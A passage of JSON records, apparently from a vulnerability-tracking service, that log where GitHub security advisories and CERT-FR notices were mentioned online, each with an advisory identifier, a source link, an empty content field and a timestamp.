"9bf0cba2-01bb-48db-8e93-d6125ea67b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQ7W-G337-39QQ", "type": "seen", "source": "https://gist.github.com/alon710/3a26ff1fbe9d67163f9157e06a925a54", "content": "", "creation_timestamp": "2026-06-15T21:21:08.000000Z"}, {"uuid": "1840424c-c280-4922-99ea-671eccc37a08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-999r-qq7v-r334", "type": "seen", "source": "https://gist.github.com/alon710/35567f659305b91f7bbc4ee7db5dd621", "content": "", "creation_timestamp": "2026-06-15T21:41:17.000000Z"}, {"uuid": "f5df24cc-ad41-4c6c-808f-44847112da50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-563q-j3cm-6jxm", "type": "seen", "source": "https://gist.github.com/alon710/b74444b3a1d431dd08f4a234b8c8a8c9", "content": "", "creation_timestamp": "2026-06-15T22:11:13.000000Z"}, {"uuid": "ee5f9570-1d45-49d4-a70b-e1da3daa2fb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hvcg-qmg6-jm4c", "type": "seen", "source": "https://gist.github.com/alon710/8b8701e874abebd14b3f406541fda6b0", "content": "", "creation_timestamp": "2026-06-15T22:41:28.000000Z"}, {"uuid": "8b3259f8-c979-43f1-88d3-cf51609467ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5w86-c3rq-vjj7", "type": "seen", "source": "https://gist.github.com/alon710/6e083e538662dc872931a903f1bab93e", "content": "", "creation_timestamp": "2026-06-15T23:11:08.000000Z"}, {"uuid": "a28bf7a3-21f4-4f72-916a-fd57c4a3f958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fhv5-28vv-h8m8", "type": "seen", "source": "https://gist.github.com/alon710/71d181c729157a76bf49cfdfcfefeae5", "content": "", "creation_timestamp": "2026-06-15T23:21:16.000000Z"}, {"uuid": "7afa67b9-2901-41bd-9765-a5cd9e7e55d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c653-97m9-rcg9", "type": "seen", "source": "https://gist.github.com/alon710/f42a6954ca4bbe69929b54a65ee51645", "content": "", "creation_timestamp": "2026-06-15T23:41:15.000000Z"}, {"uuid": "b307c9a3-c992-4828-a7a7-a7002c458746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4grm-h2qv-h6w6", "type": "seen", "source": "https://gist.github.com/alon710/bc7929d92c51f42ce9344791ed6ca313", "content": "", "creation_timestamp": "2026-06-16T00:56:16.000000Z"}, {"uuid": "69df230c-25cd-4a25-be5a-76862fcdf8b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pw6j-qg29-8w7f", "type": "seen", "source": "https://gist.github.com/alon710/43bcbcd716ebc4457fa6fbcb1b087336", "content": "", "creation_timestamp": "2026-06-16T01:11:25.000000Z"}, {"uuid": "0f476725-50f7-4055-abd2-dedecddaa57f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pw6j-qg29-8w7f", "type": "seen", "source": "https://gist.github.com/alon710/23808c1f8380a92515abff40b7e06b99", "content": "", "creation_timestamp": "2026-06-16T01:11:21.000000Z"}, {"uuid": "4b076ae6-e291-45de-8ef7-e21a1cc4d1b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mf5c-hw34-4hpp", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3moenadkbis2e", "content": "", "creation_timestamp": "2026-06-16T01:24:07.613628Z"}, {"uuid": "37439d82-dc3f-4ecb-9674-b74e5b40df5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pw6j-qg29-8w7f", "type": "seen", "source": "https://gist.github.com/alon710/da17ca39b5cf297de40d5deb00bccecd", "content": "", "creation_timestamp": "2026-06-16T01:21:14.000000Z"}, {"uuid": "be37e4e2-c686-40b0-bcd5-7f964dd0fd0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mxfr-6hcw-j9rq", "type": "seen", "source": "https://gist.github.com/Julius-mercator/b78185acb27329feb3508768444bd583", "content": "", "creation_timestamp": "2026-06-16T03:07:04.000000Z"}, {"uuid": "47e3c30d-ab54-4f3b-8383-cff36e6e5de3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-ch3q-cw5r-f4hg", "type": "seen", "source": "https://bsky.app/profile/getpacketai.bsky.social/post/3mondui6gig27", "content": "", "creation_timestamp": "2026-06-19T12:30:23.676070Z"}, {"uuid": "d196043e-8fa1-4b0e-8f08-d05c52c0fcc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6r7w372b", "content": "", "creation_timestamp": "2026-09-20T05:20:20.148548Z"}, {"uuid": "9a25d47a-b9fd-437c-9736-56ff413fa686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6qjfmk2k", "content": "", "creation_timestamp": "2026-09-20T05:20:16.003178Z"}, {"uuid": "59150494-8c31-4a72-be26-e39939683e32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w67g-5rqw-f597", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6q6hc72e", "content": "", "creation_timestamp": "2026-09-20T05:20:14.468241Z"}, {"uuid": "edbbb2b3-67fc-4a73-bbba-3a08fe13cbe8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6q6hc72e", "content": "", "creation_timestamp": "2026-09-20T05:20:14.449617Z"}, {"uuid": "0ab5f127-e191-4a1d-817d-77a4d678fc1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6pwczh2b", "content": "", "creation_timestamp": "2026-09-20T05:20:13.299763Z"}, {"uuid": "f9621d19-1785-4a36-906c-451cd9e4c987", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6pl5ah2v", "content": "", "creation_timestamp": "2026-09-20T05:20:11.142415Z"}, {"uuid": "68702157-1017-4dcb-a8a8-44b49378c660", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6p7ulh2c", "content": "", "creation_timestamp": "2026-09-20T05:20:08.973073Z"}, {"uuid": "66983643-db6b-43db-ab0b-6c5020127aab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6p2dlm2s", "content": "", "creation_timestamp": "2026-09-20T05:20:07.935066Z"}, {"uuid": "e5747bf1-dbb0-46f9-889d-e1a1469e2610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hrxh-6v49-42gf", "type": "seen", "source": "https://bsky.app/profile/gcpweekly.bsky.social/post/3mvwh6our2h2v", "content": "", "creation_timestamp": "2026-09-20T05:20:06.946830Z"}, {"uuid": "5daeea34-b681-4294-bcc6-fdf0cbc1455f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qg2g-g9w3-m5h8", "type": "seen", "source": "https://gist.github.com/alon710/50855ff55b1aa73627deda9900094dcd", "content": "", "creation_timestamp": "2026-09-19T16:32:14.384321Z"}, {"uuid": "becb15e3-68b4-4676-b241-f97a8da2f9cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p54-whvp-x327", "type": "seen", "source": "https://gist.github.com/alon710/5e8f8e10b5d10b651ea44234a36a9e37", "content": "", "creation_timestamp": "2026-09-19T15:31:23.984995Z"}, {"uuid": "9fa6f016-a415-4b9f-b335-e56b5c3b57b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5p39-cfhj-2xmp", "type": "seen", "source": "https://gist.github.com/alon710/d2d38cc91e8e28c2c97b7ca219941b98", "content": "", "creation_timestamp": "2026-09-19T14:31:33.864504Z"}, {"uuid": "9d4860e2-08a1-4568-89c3-88dd39d5bbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3w57-8xmc-8v26", "type": "seen", "source": "https://gist.github.com/alon710/fb43b5674daf6e26005b27c98e4ca3cf", "content": "", "creation_timestamp": "2026-09-19T13:31:35.820165Z"}, {"uuid": "a89b3f69-544f-4269-a24f-fa224b4c4b9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w72w-9qmj-c9qm", "type": "seen", "source": "https://gist.github.com/alon710/fd624de3e5c184e4dc7cfa7413a6955a", "content": "", "creation_timestamp": "2026-09-19T12:31:31.977942Z"}, {"uuid": "f7ac7cac-79e9-4a91-a49f-363ff34273f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vhm9-85gw-x335", "type": "seen", "source": "https://gist.github.com/jenaiho/800f787ae49ae9f3337a2b9f27171994", "content": "", "creation_timestamp": "2026-09-19T12:16:56.791964Z"}, {"uuid": "39ddffea-c0f0-4591-a54e-3730048206ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XJW9-38CR-6372", "type": "seen", "source": "https://gist.github.com/alon710/8c730a8126f8ee95b37283a6b9a1487e", "content": "", "creation_timestamp": "2026-09-18T12:31:46.608678Z"}, {"uuid": "fc293aa7-dd5d-4a7c-87a9-1d9e64f6782f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-JH4V-GFQJ-7RHX", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3468", "content": "", "creation_timestamp": "2026-09-18T12:00:05.595293Z"}, {"uuid": "d411a451-cca0-4e77-afa2-0e6e14aaedc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jq29-c7v8-rg55", "type": "seen", "source": "https://gist.github.com/alon710/424c5810a1f7a2ef19ef90cac7c85184", "content": "", "creation_timestamp": "2026-09-18T03:31:25.409902Z"}, {"uuid": "fd62917a-6100-4cf7-a2c6-ddc03e7ebd58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4v9q-p283-qc2m", "type": "seen", "source": "https://gist.github.com/alon710/c2299acc28e550e2d0a5db2c44f59d94", "content": "", "creation_timestamp": "2026-09-18T02:31:49.746703Z"}, {"uuid": "7b6e8485-7c9e-461c-9724-41856818155c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vfmf-q6x9-cw96", "type": "seen", "source": "https://gist.github.com/alon710/921970bf6a85809e6ae612195bf792e8", "content": "", "creation_timestamp": "2026-09-18T01:31:36.640071Z"}, {"uuid": "48753ae0-465f-430a-ba92-73a59421eb22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f8wv-xp27-6gq7", "type": "seen", "source": "https://gist.github.com/alon710/1cef33c0330b102b29081dbdebfcc5c4", "content": "", "creation_timestamp": "2026-09-18T00:31:13.313665Z"}, {"uuid": "ae753e37-78b7-4c53-928e-7fe4e5dd794b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q2j8-x8hf-63ch", "type": "seen", "source": "https://gist.github.com/alon710/ad6e1e5488ae59b7f526abb734e7c86a", "content": "", "creation_timestamp": "2026-09-17T23:31:57.279014Z"}, {"uuid": "f1477621-332f-4733-9dd2-c54aca688c1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhfv-7758-r9hx", "type": "seen", "source": "https://gist.github.com/alon710/70fc2f1f262a7b3002a77491b67fce87", "content": "", "creation_timestamp": "2026-09-17T22:32:09.138086Z"}, {"uuid": "c082a47f-d1a0-4f5b-9ecf-1382e4de67e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r94f-hx44-8jqf", "type": "seen", "source": "https://gist.github.com/alon710/175ef65f8b7ca8e4e6cd1e9a3b689af4", "content": "", "creation_timestamp": "2026-09-17T21:32:03.537976Z"}, {"uuid": "937c6ffc-c46c-4a9d-b1d2-82d3686237b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9395-2g46-rj3f", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvqkg5zxkt2q", "content": "", "creation_timestamp": "2026-09-17T21:02:00.100862Z"}, {"uuid": "3f8462ff-40d8-40a0-b91c-48c0f0f9f333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8phw-xrj9-cpqp", "type": "seen", "source": "https://gist.github.com/alon710/5b0e181a2056c4129c0abf0e0a3f21b2", "content": "", "creation_timestamp": "2026-09-17T20:31:26.631633Z"}, {"uuid": "20ffbf73-4fe2-4b7f-9ecf-859d3fe5127a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vrf4-mx87-p53w", "type": "seen", "source": "https://gist.github.com/alon710/2a63239df5d54f7447e1b660b93edce2", "content": "", "creation_timestamp": "2026-09-17T19:31:30.205312Z"}, {"uuid": "98cb16e9-c2f2-4b7c-9224-1a9c728cc9f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6qw9-4vv5-jr97", "type": "seen", "source": "https://gist.github.com/alon710/0c813f94f8f4231594aa209e75f9f7b9", "content": "", "creation_timestamp": "2026-09-17T18:31:18.859544Z"}, {"uuid": "18aa68ab-c272-4e18-ad3b-2d6929a307a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vrf4-mx87-p53w", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvqbeba3dn2c", "content": "", "creation_timestamp": "2026-09-17T18:19:52.878423Z"}, {"uuid": "7d901949-4102-40e1-a18f-2f7b2c3633b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-89m4-43j5-vhhx", "type": "seen", "source": "https://gist.github.com/alon710/697691f7d78bb4a6dd022b9c35afe5f3", "content": "", "creation_timestamp": "2026-09-17T17:31:17.535401Z"}, {"uuid": "9600b4e8-3d08-4eed-9b86-138b43700cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g74q-6g2f-874x", "type": "seen", "source": "https://gist.github.com/alon710/09e9ca8d1a8f5cc601598c2f89ddcc36", "content": "", "creation_timestamp": "2026-09-17T16:31:38.362604Z"}, {"uuid": "ba506f04-d3e1-441c-b674-7d6cdd733a3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wmj6-g64g-j7q5", "type": "seen", "source": "https://gist.github.com/alon710/0ec5568a7a1b950531d7e3c938789029", "content": "", "creation_timestamp": "2026-09-17T15:31:49.804043Z"}, {"uuid": "7c8e6ed5-7f74-4f80-9c6c-6fcf96eb699e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6j36-r6pr-59x4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117287023853537355", "content": "", "creation_timestamp": "2026-09-17T15:12:37.626523Z"}, {"uuid": "a845a63a-662a-4fc2-9449-dc1f3f35c72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rfx3-98h7-v3xp", "type": "seen", "source": "https://bsky.app/profile/standup.thecompound.tech/post/3mvpw3zmjmz2q", "content": "", "creation_timestamp": "2026-09-17T14:58:25.349819Z"}, {"uuid": "55188da9-7aee-49c8-bbe7-8d64f15b0642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4mf4-73j6-mvrw", "type": "seen", "source": "https://gist.github.com/alon710/1b0e2f0ae4c11e6959d410c768da8b7e", "content": "", "creation_timestamp": "2026-09-17T13:31:34.592145Z"}, {"uuid": "a70afd74-26ec-4960-bc88-a23ad9cc0e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-027", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mpehclfw2423", "content": "", "creation_timestamp": "2026-06-28T17:03:12.047085Z"}, {"uuid": "fbf8358c-d13c-4fd1-9c89-29d386a466ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-49gm-hh7w-wfvf", "type": "seen", "source": "https://gist.github.com/zSarix/66a6804b1056cbaf4c2940b8f9808613", "content": "", "creation_timestamp": "2026-06-29T13:27:42.199681Z"}, {"uuid": "c02226c3-519d-4929-aabf-38604b8715dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-25fp-8w8p-mx36", "type": "seen", "source": "https://gist.github.com/zSarix/66a6804b1056cbaf4c2940b8f9808613", "content": "", "creation_timestamp": "2026-06-29T13:27:42.173815Z"}, {"uuid": "635dd754-fbbb-4174-b827-3eff63c177d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-028", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116833591913906031", "content": "", "creation_timestamp": "2026-06-29T13:19:01.754819Z"}, {"uuid": "43a411a3-7608-4932-a092-6f2ad004bc71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-028", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mpglahrxgg2r", "content": "", "creation_timestamp": "2026-06-29T13:18:55.703208Z"}, {"uuid": "585de784-4d08-4de1-b634-fac2bcf73f63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-m63v-2g9w-2w6v", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mpkjmgapbr23", "content": "", "creation_timestamp": "2026-07-01T03:00:28.722228Z"}, {"uuid": "9c047285-0027-453d-9195-688086cf7f87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-m63v-2g9w-2w6v", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116842484590156234", "content": "", "creation_timestamp": "2026-07-01T03:00:26.767412Z"}, {"uuid": "dd8899d2-132e-4a63-8341-8df88fb7fd49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-gx55-f84r-v3r7", "type": "seen", "source": "https://bsky.app/profile/offseq.bsky.social/post/3mpkong6fmb23", "content": "", "creation_timestamp": "2026-07-01T04:30:31.470202Z"}, {"uuid": "db779a62-e20a-4576-aa02-d98eb72e43d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-gx55-f84r-v3r7", "type": "seen", "source": "https://infosec.exchange/users/offseq/statuses/116842838632410584", "content": "", "creation_timestamp": "2026-07-01T04:30:29.187643Z"}, {"uuid": "751b081c-7e18-4254-8a5d-0aa1f2353a8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/21e8411dcc1ecc12ae0a937b657f93ae", "content": "", "creation_timestamp": "2026-07-03T13:46:21.079240Z"}, {"uuid": "e32ba369-3666-4bde-b926-9f0a3dddbe3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/21e8411dcc1ecc12ae0a937b657f93ae", "content": "", "creation_timestamp": "2026-07-03T13:46:20.355866Z"}, {"uuid": "698bb060-7785-4a7a-a11a-93bc7b60db84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": "https://gist.github.com/konard/21e8411dcc1ecc12ae0a937b657f93ae", "content": "", "creation_timestamp": "2026-07-03T13:46:19.530003Z"}, {"uuid": "5528ef73-9caa-4e2a-b17e-c3039a12dbde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/e67495cdf794313ccde2b9fed3faa5e9", "content": "", "creation_timestamp": "2026-07-03T14:21:50.766509Z"}, {"uuid": "fde9645d-2ec5-4e4f-88c2-bdf88624e1c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/e67495cdf794313ccde2b9fed3faa5e9", "content": "", "creation_timestamp": "2026-07-03T14:21:48.294594Z"}, {"uuid": "df04bd41-0c41-4ad4-b086-f2357c08b5bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": "https://gist.github.com/konard/e67495cdf794313ccde2b9fed3faa5e9", "content": "", "creation_timestamp": "2026-07-03T14:21:46.134360Z"}, {"uuid": "134a3d8e-34d6-4c3b-84e5-80abd5d057a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/a81f49e6a1ec73185260f2afefbfbdf3", "content": "", "creation_timestamp": "2026-07-03T14:16:47.358712Z"}, {"uuid": "8600887d-1dcc-43ba-8bbf-3a10cfe48361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/a81f49e6a1ec73185260f2afefbfbdf3", "content": "", "creation_timestamp": "2026-07-03T14:16:45.935001Z"}, {"uuid": "f35f727a-0dcc-4ec6-ba9a-71d61a7b353b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": "https://gist.github.com/konard/a81f49e6a1ec73185260f2afefbfbdf3", "content": "", "creation_timestamp": "2026-07-03T14:16:44.347213Z"}, {"uuid": "348c948e-5d28-4400-828c-7a0752a448d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/e4ff52b4a17455dcbba82236d5b5750f", "content": "", "creation_timestamp": "2026-07-03T15:57:56.148107Z"}, {"uuid": "135d1764-ee18-48bb-9a21-010b68648cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/e4ff52b4a17455dcbba82236d5b5750f", "content": "", "creation_timestamp": "2026-07-03T15:57:54.594228Z"}, {"uuid": "b1c83677-b256-46b1-89b8-551dffaa6717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": 